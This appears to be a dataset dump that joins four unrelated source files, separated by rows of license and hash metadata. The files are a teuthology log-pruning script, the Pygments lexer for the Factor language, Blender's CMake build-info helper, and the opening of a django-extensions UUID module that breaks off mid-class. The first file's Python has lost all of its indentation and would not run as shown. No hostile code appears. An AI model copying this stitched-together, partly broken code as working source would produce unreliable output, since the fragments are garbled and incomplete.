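# Illustrative call (assumed values, not part of the original): the command-line
# front end passes a docopt-style dict, e.g.
#   main({'--verbose': False, '--archive': '/srv/teuthology/archive',
#         '--dry-run': True, '--pass': '14', '--remotes': '30'})
# which would prune passed-job logs older than 14 days and remote logs older
# than 30 days; the archive path above is only a placeholder.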
def prune_archive(archive_dir, pass_days, remotes_days, dry_run=False):
"""
Walk through the archive_dir, calling the cleanup functions to process
directories that might be old enough
"""
max_days = max(pass_days, remotes_days)
run_dirs = list()
log.debug("Archive {archive} has {count} children".format(
archive=archive_dir, count=len(os.listdir(archive_dir))))
for child in listdir(archive_dir):
item = os.path.join(archive_dir, child)
# Ensure that the path is not a symlink, is a directory, and is old
# enough to process
if (not os.path.islink(item) and os.path.isdir(item) and
is_old_enough(item, max_days)):
run_dirs.append(item)
for run_dir in run_dirs:
log.debug("Processing %s ..." % run_dir)
maybe_remove_passes(run_dir, pass_days, dry_run)
maybe_remove_remotes(run_dir, remotes_days, dry_run)
def listdir(path):
with safe_while(sleep=1, increment=1, tries=10) as proceed:
while proceed():
try:
return os.listdir(path)
except OSError:
log.exception("Failed to list %s !" % path)
def should_preserve(dir_name):
"""
Should the directory be preserved?
:returns: True if the directory contains a file named '.preserve'; False
otherwise
"""
preserve_path = os.path.join(dir_name, PRESERVE_FILE)
if os.path.isdir(dir_name) and os.path.exists(preserve_path):
return True
return False
def is_old_enough(file_name, days):
"""
:returns: True if the file's modification date is earlier than the amount
of days specified
"""
now = time.time()
secs_to_days = lambda s: s / (60 * 60 * 24)
age = now - os.path.getmtime(file_name)
if secs_to_days(age) > days:
return True
return False
def remove(path):
"""
Attempt to recursively remove a directory. If an OSError is encountered,
log it and continue.
"""
try:
shutil.rmtree(path)
except OSError:
log.exception("Failed to remove %s !" % path)
def maybe_remove_passes(run_dir, days, dry_run=False):
"""
Remove entire job log directories if they are old enough and the job passed
"""
if days < 0:
return
contents = listdir(run_dir)
if PRESERVE_FILE in contents:
return
for child in contents:
item = os.path.join(run_dir, child)
# Ensure the path isn't marked for preservation, that it is a
# directory, and that it is old enough
if (should_preserve(item) or not os.path.isdir(item) or not
is_old_enough(item, days)):
continue
# Is it a job dir?
summary_path = os.path.join(item, 'summary.yaml')
if not os.path.exists(summary_path):
continue
# Is it a passed job?
summary_lines = [line.strip() for line in
file(summary_path).readlines()]
if 'success: true' in summary_lines:
log.info("{job} is a {days}-day old passed job; removing".format(
job=item, days=days))
if not dry_run:
remove(item)
def maybe_remove_remotes(run_dir, days, dry_run=False):
"""
Remove remote logs (not teuthology logs) from job directories if they are
old enough
"""
if days < 0:
return
contents = listdir(run_dir)
if PRESERVE_FILE in contents:
return
for child in contents:
item = os.path.join(run_dir, child)
# Ensure the path isn't marked for preservation, that it is a
# directory, and that it is old enough
if (should_preserve(item) or not os.path.isdir(item) or not
is_old_enough(item, days)):
continue
# Does it have a remote subdir?
remote_path = os.path.join(item, 'remote')
if not os.path.isdir(remote_path):
continue
log.info("{job} is {days} days old; removing remote logs".format(
job=item, days=days))
if not dry_run:
remove(remote_path)
| mit | 6,905,389,367,518,952,000 | 30.267974 | 79 | 0.605142 | false |
lucywyman/slides-ii | v/lib/python2.7/site-packages/pygments/lexers/factor.py | 72 | 17864 | # -*- coding: utf-8 -*-
"""
pygments.lexers.factor
~~~~~~~~~~~~~~~~~~~~~~
Lexers for the Factor language.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, bygroups, default, words
from pygments.token import Text, Comment, Keyword, Name, String, Number
__all__ = ['FactorLexer']
class FactorLexer(RegexLexer):
"""
Lexer for the `Factor <http://factorcode.org>`_ language.
.. versionadded:: 1.4
"""
name = 'Factor'
aliases = ['factor']
filenames = ['*.factor']
mimetypes = ['text/x-factor']
flags = re.MULTILINE | re.UNICODE
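    # Hedged usage sketch (standard pygments API, not part of this lexer):
    #   from pygments import highlight
    #   from pygments.formatters import HtmlFormatter
    #   highlight(": squared ( x -- y ) dup * ;", FactorLexer(), HtmlFormatter())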
builtin_kernel = words((
'-rot', '2bi', '2bi@', '2bi*', '2curry', '2dip', '2drop', '2dup', '2keep', '2nip',
'2over', '2tri', '2tri@', '2tri*', '3bi', '3curry', '3dip', '3drop', '3dup', '3keep',
'3tri', '4dip', '4drop', '4dup', '4keep', '<wrapper>', '=', '>boolean', 'clone',
'?', '?execute', '?if', 'and', 'assert', 'assert=', 'assert?', 'bi', 'bi-curry',
'bi-curry@', 'bi-curry*', 'bi@', 'bi*', 'boa', 'boolean', 'boolean?', 'both?',
'build', 'call', 'callstack', 'callstack>array', 'callstack?', 'clear', '(clone)',
'compose', 'compose?', 'curry', 'curry?', 'datastack', 'die', 'dip', 'do', 'drop',
'dup', 'dupd', 'either?', 'eq?', 'equal?', 'execute', 'hashcode', 'hashcode*',
'identity-hashcode', 'identity-tuple', 'identity-tuple?', 'if', 'if*',
'keep', 'loop', 'most', 'new', 'nip', 'not', 'null', 'object', 'or', 'over',
'pick', 'prepose', 'retainstack', 'rot', 'same?', 'swap', 'swapd', 'throw',
'tri', 'tri-curry', 'tri-curry@', 'tri-curry*', 'tri@', 'tri*', 'tuple',
'tuple?', 'unless', 'unless*', 'until', 'when', 'when*', 'while', 'with',
'wrapper', 'wrapper?', 'xor'), suffix=r'\s')
builtin_assocs = words((
'2cache', '<enum>', '>alist', '?at', '?of', 'assoc', 'assoc-all?',
'assoc-any?', 'assoc-clone-like', 'assoc-combine', 'assoc-diff',
'assoc-diff!', 'assoc-differ', 'assoc-each', 'assoc-empty?',
'assoc-filter', 'assoc-filter!', 'assoc-filter-as', 'assoc-find',
'assoc-hashcode', 'assoc-intersect', 'assoc-like', 'assoc-map',
'assoc-map-as', 'assoc-partition', 'assoc-refine', 'assoc-size',
'assoc-stack', 'assoc-subset?', 'assoc-union', 'assoc-union!',
'assoc=', 'assoc>map', 'assoc?', 'at', 'at+', 'at*', 'cache', 'change-at',
'clear-assoc', 'delete-at', 'delete-at*', 'enum', 'enum?', 'extract-keys',
'inc-at', 'key?', 'keys', 'map>assoc', 'maybe-set-at', 'new-assoc', 'of',
'push-at', 'rename-at', 'set-at', 'sift-keys', 'sift-values', 'substitute',
'unzip', 'value-at', 'value-at*', 'value?', 'values', 'zip'), suffix=r'\s')
builtin_combinators = words((
'2cleave', '2cleave>quot', '3cleave', '3cleave>quot', '4cleave',
'4cleave>quot', 'alist>quot', 'call-effect', 'case', 'case-find',
'case>quot', 'cleave', 'cleave>quot', 'cond', 'cond>quot', 'deep-spread>quot',
'execute-effect', 'linear-case-quot', 'no-case', 'no-case?', 'no-cond',
'no-cond?', 'recursive-hashcode', 'shallow-spread>quot', 'spread',
'to-fixed-point', 'wrong-values', 'wrong-values?'), suffix=r'\s')
builtin_math = words((
'-', '/', '/f', '/i', '/mod', '2/', '2^', '<', '<=', '<fp-nan>', '>',
'>=', '>bignum', '>fixnum', '>float', '>integer', '(all-integers?)',
'(each-integer)', '(find-integer)', '*', '+', '?1+',
'abs', 'align', 'all-integers?', 'bignum', 'bignum?', 'bit?', 'bitand',
'bitnot', 'bitor', 'bits>double', 'bits>float', 'bitxor', 'complex',
'complex?', 'denominator', 'double>bits', 'each-integer', 'even?',
'find-integer', 'find-last-integer', 'fixnum', 'fixnum?', 'float',
'float>bits', 'float?', 'fp-bitwise=', 'fp-infinity?', 'fp-nan-payload',
'fp-nan?', 'fp-qnan?', 'fp-sign', 'fp-snan?', 'fp-special?',
'if-zero', 'imaginary-part', 'integer', 'integer>fixnum',
'integer>fixnum-strict', 'integer?', 'log2', 'log2-expects-positive',
'log2-expects-positive?', 'mod', 'neg', 'neg?', 'next-float',
'next-power-of-2', 'number', 'number=', 'number?', 'numerator', 'odd?',
'out-of-fixnum-range', 'out-of-fixnum-range?', 'power-of-2?',
'prev-float', 'ratio', 'ratio?', 'rational', 'rational?', 'real',
'real-part', 'real?', 'recip', 'rem', 'sgn', 'shift', 'sq', 'times',
'u<', 'u<=', 'u>', 'u>=', 'unless-zero', 'unordered?', 'when-zero',
'zero?'), suffix=r'\s')
builtin_sequences = words((
'1sequence', '2all?', '2each', '2map', '2map-as', '2map-reduce', '2reduce',
'2selector', '2sequence', '3append', '3append-as', '3each', '3map', '3map-as',
'3sequence', '4sequence', '<repetition>', '<reversed>', '<slice>', '?first',
'?last', '?nth', '?second', '?set-nth', 'accumulate', 'accumulate!',
'accumulate-as', 'all?', 'any?', 'append', 'append!', 'append-as',
'assert-sequence', 'assert-sequence=', 'assert-sequence?',
'binary-reduce', 'bounds-check', 'bounds-check?', 'bounds-error',
'bounds-error?', 'but-last', 'but-last-slice', 'cartesian-each',
'cartesian-map', 'cartesian-product', 'change-nth', 'check-slice',
'check-slice-error', 'clone-like', 'collapse-slice', 'collector',
'collector-for', 'concat', 'concat-as', 'copy', 'count', 'cut', 'cut-slice',
'cut*', 'delete-all', 'delete-slice', 'drop-prefix', 'each', 'each-from',
'each-index', 'empty?', 'exchange', 'filter', 'filter!', 'filter-as', 'find',
'find-from', 'find-index', 'find-index-from', 'find-last', 'find-last-from',
'first', 'first2', 'first3', 'first4', 'flip', 'follow', 'fourth', 'glue', 'halves',
'harvest', 'head', 'head-slice', 'head-slice*', 'head*', 'head?',
'if-empty', 'immutable', 'immutable-sequence', 'immutable-sequence?',
'immutable?', 'index', 'index-from', 'indices', 'infimum', 'infimum-by',
'insert-nth', 'interleave', 'iota', 'iota-tuple', 'iota-tuple?', 'join',
'join-as', 'last', 'last-index', 'last-index-from', 'length', 'lengthen',
'like', 'longer', 'longer?', 'longest', 'map', 'map!', 'map-as', 'map-find',
'map-find-last', 'map-index', 'map-integers', 'map-reduce', 'map-sum',
'max-length', 'member-eq?', 'member?', 'midpoint@', 'min-length',
'mismatch', 'move', 'new-like', 'new-resizable', 'new-sequence',
'non-negative-integer-expected', 'non-negative-integer-expected?',
'nth', 'nths', 'pad-head', 'pad-tail', 'padding', 'partition', 'pop', 'pop*',
'prefix', 'prepend', 'prepend-as', 'produce', 'produce-as', 'product', 'push',
'push-all', 'push-either', 'push-if', 'reduce', 'reduce-index', 'remove',
'remove!', 'remove-eq', 'remove-eq!', 'remove-nth', 'remove-nth!', 'repetition',
'repetition?', 'replace-slice', 'replicate', 'replicate-as', 'rest',
'rest-slice', 'reverse', 'reverse!', 'reversed', 'reversed?', 'second',
'selector', 'selector-for', 'sequence', 'sequence-hashcode', 'sequence=',
'sequence?', 'set-first', 'set-fourth', 'set-last', 'set-length', 'set-nth',
'set-second', 'set-third', 'short', 'shorten', 'shorter', 'shorter?',
'shortest', 'sift', 'slice', 'slice-error', 'slice-error?', 'slice?',
'snip', 'snip-slice', 'start', 'start*', 'subseq', 'subseq?', 'suffix',
'suffix!', 'sum', 'sum-lengths', 'supremum', 'supremum-by', 'surround', 'tail',
'tail-slice', 'tail-slice*', 'tail*', 'tail?', 'third', 'trim',
'trim-head', 'trim-head-slice', 'trim-slice', 'trim-tail', 'trim-tail-slice',
'unclip', 'unclip-last', 'unclip-last-slice', 'unclip-slice', 'unless-empty',
'virtual-exemplar', 'virtual-sequence', 'virtual-sequence?', 'virtual@',
'when-empty'), suffix=r'\s')
builtin_namespaces = words((
'+@', 'change', 'change-global', 'counter', 'dec', 'get', 'get-global',
'global', 'inc', 'init-namespaces', 'initialize', 'is-global', 'make-assoc',
'namespace', 'namestack', 'off', 'on', 'set', 'set-global', 'set-namestack',
'toggle', 'with-global', 'with-scope', 'with-variable', 'with-variables'),
suffix=r'\s')
builtin_arrays = words((
'1array', '2array', '3array', '4array', '<array>', '>array', 'array',
'array?', 'pair', 'pair?', 'resize-array'), suffix=r'\s')
builtin_io = words((
'(each-stream-block-slice)', '(each-stream-block)',
'(stream-contents-by-block)', '(stream-contents-by-element)',
'(stream-contents-by-length-or-block)',
'(stream-contents-by-length)', '+byte+', '+character+',
'bad-seek-type', 'bad-seek-type?', 'bl', 'contents', 'each-block',
'each-block-size', 'each-block-slice', 'each-line', 'each-morsel',
'each-stream-block', 'each-stream-block-slice', 'each-stream-line',
'error-stream', 'flush', 'input-stream', 'input-stream?',
'invalid-read-buffer', 'invalid-read-buffer?', 'lines', 'nl',
'output-stream', 'output-stream?', 'print', 'read', 'read-into',
'read-partial', 'read-partial-into', 'read-until', 'read1', 'readln',
'seek-absolute', 'seek-absolute?', 'seek-end', 'seek-end?',
'seek-input', 'seek-output', 'seek-relative', 'seek-relative?',
'stream-bl', 'stream-contents', 'stream-contents*', 'stream-copy',
'stream-copy*', 'stream-element-type', 'stream-flush',
'stream-length', 'stream-lines', 'stream-nl', 'stream-print',
'stream-read', 'stream-read-into', 'stream-read-partial',
'stream-read-partial-into', 'stream-read-partial-unsafe',
'stream-read-unsafe', 'stream-read-until', 'stream-read1',
'stream-readln', 'stream-seek', 'stream-seekable?', 'stream-tell',
'stream-write', 'stream-write1', 'tell-input', 'tell-output',
'with-error-stream', 'with-error-stream*', 'with-error>output',
'with-input-output+error-streams',
'with-input-output+error-streams*', 'with-input-stream',
'with-input-stream*', 'with-output-stream', 'with-output-stream*',
'with-output>error', 'with-output+error-stream',
'with-output+error-stream*', 'with-streams', 'with-streams*',
'write', 'write1'), suffix=r'\s')
builtin_strings = words((
'1string', '<string>', '>string', 'resize-string', 'string',
'string?'), suffix=r'\s')
builtin_vectors = words((
'1vector', '<vector>', '>vector', '?push', 'vector', 'vector?'),
suffix=r'\s')
builtin_continuations = words((
'<condition>', '<continuation>', '<restart>', 'attempt-all',
'attempt-all-error', 'attempt-all-error?', 'callback-error-hook',
'callcc0', 'callcc1', 'cleanup', 'compute-restarts', 'condition',
'condition?', 'continuation', 'continuation?', 'continue',
'continue-restart', 'continue-with', 'current-continuation',
'error', 'error-continuation', 'error-in-thread', 'error-thread',
'ifcc', 'ignore-errors', 'in-callback?', 'original-error', 'recover',
'restart', 'restart?', 'restarts', 'rethrow', 'rethrow-restarts',
'return', 'return-continuation', 'thread-error-hook', 'throw-continue',
'throw-restarts', 'with-datastack', 'with-return'), suffix=r'\s')
tokens = {
'root': [
# factor allows a file to start with a shebang
(r'#!.*$', Comment.Preproc),
default('base'),
],
'base': [
(r'\s+', Text),
# defining words
(r'((?:MACRO|MEMO|TYPED)?:[:]?)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function)),
(r'(M:[:]?)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Class, Text, Name.Function)),
(r'(C:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function, Text, Name.Class)),
(r'(GENERIC:)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function)),
(r'(HOOK:|GENERIC#)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function, Text, Name.Function)),
(r'\(\s', Name.Function, 'stackeffect'),
(r';\s', Keyword),
# imports and namespaces
(r'(USING:)(\s+)',
bygroups(Keyword.Namespace, Text), 'vocabs'),
(r'(USE:|UNUSE:|IN:|QUALIFIED:)(\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Namespace)),
(r'(QUALIFIED-WITH:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Namespace, Text, Name.Namespace)),
(r'(FROM:|EXCLUDE:)(\s+)(\S+)(\s+=>\s)',
bygroups(Keyword.Namespace, Text, Name.Namespace, Text), 'words'),
(r'(RENAME:)(\s+)(\S+)(\s+)(\S+)(\s+=>\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Function, Text, Name.Namespace, Text, Name.Function)),
(r'(ALIAS:|TYPEDEF:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Function, Text, Name.Function)),
(r'(DEFER:|FORGET:|POSTPONE:)(\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Function)),
# tuples and classes
(r'(TUPLE:|ERROR:)(\s+)(\S+)(\s+<\s+)(\S+)',
bygroups(Keyword, Text, Name.Class, Text, Name.Class), 'slots'),
(r'(TUPLE:|ERROR:|BUILTIN:)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Class), 'slots'),
(r'(MIXIN:|UNION:|INTERSECTION:)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Class)),
(r'(PREDICATE:)(\s+)(\S+)(\s+<\s+)(\S+)',
bygroups(Keyword, Text, Name.Class, Text, Name.Class)),
(r'(C:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function, Text, Name.Class)),
(r'(INSTANCE:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Class, Text, Name.Class)),
(r'(SLOT:)(\s+)(\S+)', bygroups(Keyword, Text, Name.Function)),
(r'(SINGLETON:)(\s+)(\S+)', bygroups(Keyword, Text, Name.Class)),
(r'SINGLETONS:', Keyword, 'classes'),
# other syntax
(r'(CONSTANT:|SYMBOL:|MAIN:|HELP:)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function)),
(r'SYMBOLS:\s', Keyword, 'words'),
(r'SYNTAX:\s', Keyword),
(r'ALIEN:\s', Keyword),
(r'(STRUCT:)(\s+)(\S+)', bygroups(Keyword, Text, Name.Class)),
(r'(FUNCTION:)(\s+\S+\s+)(\S+)(\s+\(\s+[^)]+\)\s)',
bygroups(Keyword.Namespace, Text, Name.Function, Text)),
(r'(FUNCTION-ALIAS:)(\s+)(\S+)(\s+\S+\s+)(\S+)(\s+\(\s+[^)]+\)\s)',
bygroups(Keyword.Namespace, Text, Name.Function, Text, Name.Function, Text)),
# vocab.private
(r'(?:<PRIVATE|PRIVATE>)\s', Keyword.Namespace),
# strings
(r'"""\s+(?:.|\n)*?\s+"""', String),
(r'"(?:\\\\|\\"|[^"])*"', String),
(r'\S+"\s+(?:\\\\|\\"|[^"])*"', String),
(r'CHAR:\s+(?:\\[\\abfnrstv]|[^\\]\S*)\s', String.Char),
# comments
(r'!\s+.*$', Comment),
(r'#!\s+.*$', Comment),
(r'/\*\s+(?:.|\n)*?\s\*/\s', Comment),
# boolean constants
(r'[tf]\s', Name.Constant),
# symbols and literals
(r'[\\$]\s+\S+', Name.Constant),
(r'M\\\s+\S+\s+\S+', Name.Constant),
# numbers
(r'[+-]?(?:[\d,]*\d)?\.(?:\d([\d,]*\d)?)?(?:[eE][+-]?\d+)?\s', Number),
(r'[+-]?\d(?:[\d,]*\d)?(?:[eE][+-]?\d+)?\s', Number),
(r'0x[a-fA-F\d](?:[a-fA-F\d,]*[a-fA-F\d])?(?:p\d([\d,]*\d)?)?\s', Number),
(r'NAN:\s+[a-fA-F\d](?:[a-fA-F\d,]*[a-fA-F\d])?(?:p\d([\d,]*\d)?)?\s', Number),
(r'0b[01]+\s', Number.Bin),
(r'0o[0-7]+\s', Number.Oct),
(r'(?:\d([\d,]*\d)?)?\+\d(?:[\d,]*\d)?/\d(?:[\d,]*\d)?\s', Number),
(r'(?:\-\d([\d,]*\d)?)?\-\d(?:[\d,]*\d)?/\d(?:[\d,]*\d)?\s', Number),
# keywords
(r'(?:deprecated|final|foldable|flushable|inline|recursive)\s',
Keyword),
# builtins
(builtin_kernel, Name.Builtin),
(builtin_assocs, Name.Builtin),
(builtin_combinators, Name.Builtin),
(builtin_math, Name.Builtin),
(builtin_sequences, Name.Builtin),
(builtin_namespaces, Name.Builtin),
(builtin_arrays, Name.Builtin),
(builtin_io, Name.Builtin),
(builtin_strings, Name.Builtin),
(builtin_vectors, Name.Builtin),
(builtin_continuations, Name.Builtin),
# everything else is text
(r'\S+', Text),
],
'stackeffect': [
(r'\s+', Text),
(r'\(\s+', Name.Function, 'stackeffect'),
(r'\)\s', Name.Function, '#pop'),
(r'--\s', Name.Function),
(r'\S+', Name.Variable),
],
'slots': [
(r'\s+', Text),
(r';\s', Keyword, '#pop'),
(r'(\{\s+)(\S+)(\s+[^}]+\s+\}\s)',
bygroups(Text, Name.Variable, Text)),
(r'\S+', Name.Variable),
],
'vocabs': [
(r'\s+', Text),
(r';\s', Keyword, '#pop'),
(r'\S+', Name.Namespace),
],
'classes': [
(r'\s+', Text),
(r';\s', Keyword, '#pop'),
(r'\S+', Name.Class),
],
'words': [
(r'\s+', Text),
(r';\s', Keyword, '#pop'),
(r'\S+', Name.Function),
],
}
| apache-2.0 | 2,164,327,082,958,854,700 | 50.930233 | 106 | 0.508453 | false |
pawkoz/dyplom | blender/build_files/cmake/project_source_info.py | 2 | 7070 | # ***** BEGIN GPL LICENSE BLOCK *****
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# Contributor(s): Campbell Barton
#
# ***** END GPL LICENSE BLOCK *****
# <pep8 compliant>
__all__ = (
"build_info",
"SOURCE_DIR",
)
import sys
if not sys.version.startswith("3"):
print("\nPython3.x needed, found %s.\nAborting!\n" %
sys.version.partition(" ")[0])
sys.exit(1)
import os
from os.path import join, dirname, normpath, abspath
SOURCE_DIR = join(dirname(__file__), "..", "..")
SOURCE_DIR = normpath(SOURCE_DIR)
SOURCE_DIR = abspath(SOURCE_DIR)
def is_c_header(filename):
ext = os.path.splitext(filename)[1]
return (ext in {".h", ".hpp", ".hxx", ".hh"})
def is_c(filename):
ext = os.path.splitext(filename)[1]
return (ext in {".c", ".cpp", ".cxx", ".m", ".mm", ".rc", ".cc", ".inl", ".osl"})
def is_c_any(filename):
    return is_c(filename) or is_c_header(filename)
# copied from project_info.py
CMAKE_DIR = "."
def cmake_cache_var_iter():
import re
re_cache = re.compile(r'([A-Za-z0-9_\-]+)?:?([A-Za-z0-9_\-]+)?=(.*)$')
with open(join(CMAKE_DIR, "CMakeCache.txt"), 'r', encoding='utf-8') as cache_file:
for l in cache_file:
match = re_cache.match(l.strip())
if match is not None:
var, type_, val = match.groups()
yield (var, type_ or "", val)
def cmake_cache_var(var):
for var_iter, type_iter, value_iter in cmake_cache_var_iter():
if var == var_iter:
return value_iter
return None
def do_ignore(filepath, ignore_prefix_list):
if ignore_prefix_list is None:
return False
relpath = os.path.relpath(filepath, SOURCE_DIR)
return any([relpath.startswith(prefix) for prefix in ignore_prefix_list])
def makefile_log():
import subprocess
import time
# support both make and ninja
make_exe = cmake_cache_var("CMAKE_MAKE_PROGRAM")
make_exe_basename = os.path.basename(make_exe)
if make_exe_basename.startswith(("make", "gmake")):
print("running 'make' with --dry-run ...")
process = subprocess.Popen([make_exe, "--always-make", "--dry-run", "--keep-going", "VERBOSE=1"],
stdout=subprocess.PIPE,
)
elif make_exe_basename.startswith("ninja"):
print("running 'ninja' with -t commands ...")
process = subprocess.Popen([make_exe, "-t", "commands"],
stdout=subprocess.PIPE,
)
while process.poll():
time.sleep(1)
out = process.stdout.read()
process.stdout.close()
print("done!", len(out), "bytes")
return out.decode("utf-8", errors="ignore").split("\n")
def build_info(use_c=True, use_cxx=True, ignore_prefix_list=None):
makelog = makefile_log()
source = []
compilers = []
if use_c:
compilers.append(cmake_cache_var("CMAKE_C_COMPILER"))
if use_cxx:
compilers.append(cmake_cache_var("CMAKE_CXX_COMPILER"))
print("compilers:", " ".join(compilers))
fake_compiler = "%COMPILER%"
print("parsing make log ...")
for line in makelog:
args = line.split()
if not any([(c in args) for c in compilers]):
continue
        # join args in case they are not already a single string.
args = ' '.join(args)
args = args.replace(" -isystem", " -I")
args = args.replace(" -D ", " -D")
args = args.replace(" -I ", " -I")
for c in compilers:
args = args.replace(c, fake_compiler)
args = args.split()
# end
# remove compiler
args[:args.index(fake_compiler) + 1] = []
c_files = [f for f in args if is_c(f)]
inc_dirs = [f[2:].strip() for f in args if f.startswith('-I')]
defs = [f[2:].strip() for f in args if f.startswith('-D')]
for c in sorted(c_files):
if do_ignore(c, ignore_prefix_list):
continue
source.append((c, inc_dirs, defs))
# make relative includes absolute
# not totally essential but useful
for i, f in enumerate(inc_dirs):
if not os.path.isabs(f):
inc_dirs[i] = os.path.abspath(os.path.join(CMAKE_DIR, f))
# safety check that our includes are ok
for f in inc_dirs:
if not os.path.exists(f):
raise Exception("%s missing" % f)
print("done!")
return source
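# Sketch of how the result is typically consumed (assumed caller code, not part
# of the original): each entry is a (c_file, include_dirs, defines) triple.
#   for c, inc_dirs, defs in build_info(ignore_prefix_list=["intern/"]):
#       args = ["-I" + i for i in inc_dirs] + ["-D" + d for d in defs]
# The "intern/" prefix above is only an example value.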
def build_defines_as_source():
"""
Returns a string formatted as an include:
'#defines A=B\n#define....'
"""
import subprocess
# works for both gcc and clang
cmd = (cmake_cache_var("CMAKE_C_COMPILER"), "-dM", "-E", "-")
return subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.DEVNULL,
).stdout.read().strip().decode('ascii')
def build_defines_as_args():
return [("-D" + "=".join(l.split(maxsplit=2)[1:]))
for l in build_defines_as_source().split("\n")
if l.startswith('#define')]
# could be moved elsewhere!, this just happens to be used by scripts that also
# use this module.
def queue_processes(process_funcs, job_total=-1):
""" Takes a list of function arg pairs, each function must return a process
"""
if job_total == -1:
import multiprocessing
job_total = multiprocessing.cpu_count()
del multiprocessing
if job_total == 1:
for func, args in process_funcs:
sys.stdout.flush()
sys.stderr.flush()
process = func(*args)
process.wait()
else:
import time
processes = []
for func, args in process_funcs:
            # wait until a process slot is free
while 1:
processes[:] = [p for p in processes if p.poll() is None]
if len(processes) <= job_total:
break
else:
time.sleep(0.1)
sys.stdout.flush()
sys.stderr.flush()
processes.append(func(*args))
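# Example of the expected argument shape (hypothetical compile command shown):
# each pair is (callable, args) where callable(*args) returns a Popen-like object.
#   import subprocess
#   queue_processes([(subprocess.Popen, (["gcc", "-c", f],)) for f in c_files])
# Here c_files is an assumed list of C source paths.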
def main():
if not os.path.exists(join(CMAKE_DIR, "CMakeCache.txt")):
print("This script must run from the cmake build dir")
return
for s in build_info():
print(s)
if __name__ == "__main__":
main()
| gpl-2.0 | -4,033,341,245,711,790,000 | 27.508065 | 105 | 0.569448 | false |
openhatch/oh-mainline | vendor/packages/django-extensions/django_extensions/utils/uuid.py | 44 | 20400 | r"""UUID objects (universally unique identifiers) according to RFC 4122.
This module provides immutable UUID objects (class UUID) and the functions
uuid1(), uuid3(), uuid4(), uuid5() for generating version 1, 3, 4, and 5
UUIDs as specified in RFC 4122.
If all you want is a unique ID, you should probably call uuid1() or uuid4().
Note that uuid1() may compromise privacy since it creates a UUID containing
the computer's network address. uuid4() creates a random UUID.
Typical usage:
>>> import uuid
# make a UUID based on the host ID and current time
>>> uuid.uuid1()
UUID('a8098c1a-f86e-11da-bd1a-00112444be1e')
# make a UUID using an MD5 hash of a namespace UUID and a name
>>> uuid.uuid3(uuid.NAMESPACE_DNS, 'python.org')
UUID('6fa459ea-ee8a-3ca4-894e-db77e160355e')
# make a random UUID
>>> uuid.uuid4()
UUID('16fd2706-8baf-433b-82eb-8c7fada847da')
# make a UUID using a SHA-1 hash of a namespace UUID and a name
>>> uuid.uuid5(uuid.NAMESPACE_DNS, 'python.org')
UUID('886313e1-3b8a-5372-9b90-0c9aee199e5d')
# make a UUID from a string of hex digits (braces and hyphens ignored)
>>> x = uuid.UUID('{00010203-0405-0607-0809-0a0b0c0d0e0f}')
# convert a UUID to a string of hex digits in standard form
>>> str(x)
'00010203-0405-0607-0809-0a0b0c0d0e0f'
# get the raw 16 bytes of the UUID
>>> x.bytes
'\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r\x0e\x0f'
# make a UUID from a 16-byte string
>>> uuid.UUID(bytes=x.bytes)
UUID('00010203-0405-0607-0809-0a0b0c0d0e0f')
"""
__author__ = 'Ka-Ping Yee <[email protected]>'
RESERVED_NCS, RFC_4122, RESERVED_MICROSOFT, RESERVED_FUTURE = [
'reserved for NCS compatibility', 'specified in RFC 4122',
'reserved for Microsoft compatibility', 'reserved for future definition'
]
class UUID(object):
"""Instances of the UUID class represent UUIDs as specified in RFC 4122.
UUID objects are immutable, hashable, and usable as dictionary keys.
Converting a UUID to a string with str() yields something in the form
'12345678-1234-1234-1234-123456789abc'. The UUID constructor accepts
five possible forms: a similar string of hexadecimal digits, or a tuple
of six integer fields (with 32-bit, 16-bit, 16-bit, 8-bit, 8-bit, and
48-bit values respectively) as an argument named 'fields', or a string
of 16 bytes (with all the integer fields in big-endian order) as an
argument named 'bytes', or a string of 16 bytes (with the first three
fields in little-endian order) as an argument named 'bytes_le', or a
single 128-bit integer as an argument named 'int'.
UUIDs have these read-only attributes:
bytes the UUID as a 16-byte string (containing the six
integer fields in big-endian byte order)
bytes_le the UUID as a 16-byte string (with time_low, time_mid,
and time_hi_version in little-endian byte order)
fields a tuple of the six integer fields of the UUID,
which are also available as six individual attributes
and two derived attributes:
time_low the first 32 bits of the UUID
time_mid the next 16 bits of the UUID
time_hi_version the next 16 bits of the UUID
clock_seq_hi_variant the next 8 bits of the UUID
clock_seq_low the next 8 bits of the UUID
node the last 48 bits of the UUID
time the 60-bit timestamp
clock_seq the 14-bit sequence number
hex the UUID as a 32-character hexadecimal string
int the UUID as a 128-bit integer
urn the UUID as a URN as specified in RFC 4122
variant the UUID variant (one of the constants RESERVED_NCS,
RFC_4122, RESERVED_MICROSOFT, or RESERVED_FUTURE)
version the UUID version number (1 through 5, meaningful only
when the variant is RFC_4122)
"""
def __init__(self, hex=None, bytes=None, bytes_le=None, fields=None,
int=None, version=None):
